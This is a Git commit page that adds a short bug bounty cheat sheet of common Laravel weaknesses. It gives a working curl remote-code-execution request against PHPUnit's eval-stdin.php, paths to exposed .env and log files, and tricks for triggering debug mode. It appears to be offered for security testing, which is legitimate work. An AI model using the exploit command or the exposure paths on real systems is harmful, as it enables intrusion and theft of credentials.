ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2025-01-30 14:55:05 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Laravel [1]

Browse Source 
Create laravel tips and add 4 tips
This commit is contained in:
Muhammad Daffa 2020-09-08 17:26:12 +07:00 committed by GitHub
parent bced4b21eb
commit 8b8613272e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
Framework/laravel.md Normal file
View File

@ -0,0 +1,26 @@
# Common bug in laravel framework
1. Laravel PHPUnit Remote Code Execution
* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
* Affected versions : Before 4.8.28 and 5.x before 5.6.3
Command
```
curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```
2. Exposed environment variables
* Full Path Exploit : http://target.com/.env
![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
3. Exposed log files
* Full Path Exploit : http://target.com/storage/logs/laravel.log
4. Laravel Debug Mode Enabled
* Using SQL injection query in GET or POST method
* Try path /logout (ex:target.com/logout)
* Using [] in paramater (ex:target.com/param[]=0)
![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)